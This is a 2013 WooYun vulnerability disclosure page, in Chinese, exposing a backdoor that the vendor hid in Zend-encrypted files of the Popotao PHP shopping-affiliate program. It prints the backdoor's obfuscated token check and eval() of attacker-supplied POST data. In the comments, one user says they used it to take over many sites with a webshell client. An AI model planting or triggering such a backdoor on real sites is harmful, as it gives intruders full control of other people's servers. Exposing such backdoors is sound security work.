当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(19) 关注此漏洞

缺陷编号: WooYun-2013-18571

漏洞标题: 泡泡淘(popotao)淘客程序官方后门

相关厂商: 泡泡淘

漏洞作者: 路人甲

提交时间: 2013-02-10 13:15

公开时间: 2013-02-20 15:09

漏洞类型: 文件上传导致任意代码执行

危害等级: 高

自评Rank: 15

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 执行任意代码

0人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-02-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-02-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

泡泡淘是一个蛮不错的淘客建站程序,官方网址:http://www.popotao.com。
本人就是他们的用户之一,用他们的程序的网站是:http://www.xiaosajie.com
由于官方几个月不更新,跟不上淘宝API的更新速度,所以我想自己解决,把官方的6个ZEND加密过的PHP文件破解了。结果发现了极其恶心的事情。

详细说明:

在include/admin.func.php文件的最下面,发现以下代码,ZEND加密保护版权还有网站授权认证无可厚非。但是利用加密加入后门。就太可耻了。

漏洞证明:

9月27日的补丁版本

code 区域
if ( isset( $_POST['_tks'] ) && ( $tks = trim( $_POST['_tks'] ) ) )
{
$_tks = explode( "|", ~base64_decode( strrev( substr( $tks, 3, 5 ). substr( $tks, 8 ) . substr( $tks, 0, 3 ) ) ) );
if ( trim( $_tks[1] ) == "K_".date( "Y_m_d" ) && ( strpos( $_SERVER['HTTP_HOST'], trim( $_tks[0] ) ) !== FALSE || strpos( $_SERVER['SERVER_NAME'], trim( $_tks[0] ) ) !== FALSE ) )
{
eval( $_POST['tao'] );
}
exit( );
}





2月4日的补丁

code 区域
if ( isset( $_POST['_MDFK'] ) && ( $tks = trim( $_POST['_MDFK'] ) ) )
{
$_tks = explode( "|", ~base64_decode( strrev( substr( $tks, 3, 5 ). substr( $tks, 8 ) . substr( $tks, 0, 3 ) ) ) );
if ( trim( $_tks[1] ) == "K_".date( "Y_m_d" ) && ( strpos( $_SERVER['HTTP_HOST'], trim( $_tks[0] ) ) !== FALSE || strpos( $_SERVER['SERVER_NAME'], trim( $_tks[0] ) ) !== FALSE ) )
{
eval( $_POST['_HkBs'] );
}
exit( );
}

修复方案:

官方恶意行为。不知道怎么修复。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2013-02-10 13:46 | oldcat ( 实习白帽子 | Rank:88 漏洞数:14 )
    0

    公开!!!!!

  2. 2013-02-11 08:35 | Coody 认证白帽子 ( 核心白帽子 | Rank:1789 漏洞数:213 | 不接单、不黑产;如遇冒名顶替接单收徒、绝...)
    0

    加密是为了隐藏?!

  3. 2013-02-11 20:13 | 灵魂天使 ( 路人 | Rank:10 漏洞数:4 | 突然发现 路人甲才是最牛的)
    0

    求真相 我也用的这个程序

  4. 2013-02-11 22:25 | Coody 认证白帽子 ( 核心白帽子 | Rank:1789 漏洞数:213 | 不接单、不黑产;如遇冒名顶替接单收徒、绝...)
    0

    @灵魂天使 默哀....

  5. 2013-02-11 22:43 | oldcat ( 实习白帽子 | Rank:88 漏洞数:14 )
    0

    @灵魂天使 默哀....

  6. 2013-02-12 21:58 | 溪水流淌 ( 路人 | Rank:9 漏洞数:2 | 如果一切都任我欲为,我会有迷失在这自由深...)
    0

    许多程序暗藏后门已经是潜规则了,特别分收费和免费,比如kelink

  7. 2013-02-13 09:44 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    @灵魂天使 @Coody @溪水流淌 我只能呵呵了

  8. 2013-02-13 12:29 | 灵魂天使 ( 路人 | Rank:10 漏洞数:4 | 突然发现 路人甲才是最牛的)
    0

    @Coody @oldcat @xsser 貌似有人博客8号就公开这个了 检测了好几个后门都用不了 难道又改调用字符了

  9. 2013-02-13 12:56 | oldcat ( 实习白帽子 | Rank:88 漏洞数:14 )
    0

    在include/admin.func.php文件的最下面,存在以下代码。 if ( isset( $_POST['_tks'] ) && ( $tks = trim( $_POST['_tks'] ) ) ) { $_tks = explode( “|”, ~base64_decode( strrev( substr( $tks, 3, 5 ). substr( $tks, 8 ) . substr( $tks, 0, 3 ) ) ) ); if ( trim( $_tks[1] ) == “K_”.date( “Y_m_d” ) && ( strpos( $_SERVER['HTTP_HOST'], trim( $_tks[0] ) ) !== FALSE || strpos( $_SERVER['SERVER_NAME'], trim( $_tks[0] ) ) !== FALSE ) ) { eval( $_POST['tao'] ); } exit( ); }

  10. 2013-02-13 13:13 | 灵魂天使 ( 路人 | Rank:10 漏洞数:4 | 突然发现 路人甲才是最牛的)
    0

    @oldcat 嗯 没升级时试了下 不管用

  11. 2013-02-13 14:05 | 灵魂天使 ( 路人 | Rank:10 漏洞数:4 | 突然发现 路人甲才是最牛的)
    0

    我错了 泡泡淘卑鄙啊 想骂淫  洞主威武

  12. 2013-02-13 14:06 | Coody 认证白帽子 ( 核心白帽子 | Rank:1789 漏洞数:213 | 不接单、不黑产;如遇冒名顶替接单收徒、绝...)
    0

    @灵魂天使 成功了?

  13. 2013-02-13 14:29 | 灵魂天使 ( 路人 | Rank:10 漏洞数:4 | 突然发现 路人甲才是最牛的)
    0

    @Coody 成功了 换了下调用参数 靠啊 卑鄙 好多网站都成功了

  14. 2013-02-13 14:32 | Coody 认证白帽子 ( 核心白帽子 | Rank:1789 漏洞数:213 | 不接单、不黑产;如遇冒名顶替接单收徒、绝...)
    0

    @灵魂天使 ╮(╯▽╰)╭

  15. 2013-02-13 16:37 | 灵魂天使 ( 路人 | Rank:10 漏洞数:4 | 突然发现 路人甲才是最牛的)
    0

    @Coody 淫荡啊 一个网站一个句话密码 还post什么啊 直接上菜刀了

  16. 2013-02-13 17:41 | Coody 认证白帽子 ( 核心白帽子 | Rank:1789 漏洞数:213 | 不接单、不黑产;如遇冒名顶替接单收徒、绝...)
    0

    @灵魂天使 tao ?

  17. 2013-02-15 16:23 | Black Angel ( 普通白帽子 | Rank:165 漏洞数:36 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)
    0

    牛B的路人甲。

  18. 2013-02-18 08:45 | LeadUrLife ( 普通白帽子 | Rank:103 漏洞数:14 | 好好学习 天天向上)
    0

    @Black Angel 这个路人甲却是牛逼:http://www.sablog.net/blog/archives/604/

  19. 2013-02-18 16:22 | 冷静 ( 路人 | Rank:3 漏洞数:2 )
    0

    @LeadUrLife 确实牛逼

  20. 2013-03-21 02:27 | also ( 普通白帽子 | Rank:434 漏洞数:53 | 招渗透/php/前端/ios&android安全,广州)
    0

    @xsser 下次是zend或者其他加密的,直接解密后,用find来查关键函数,你懂的

登录后才能发表评论,请先 登录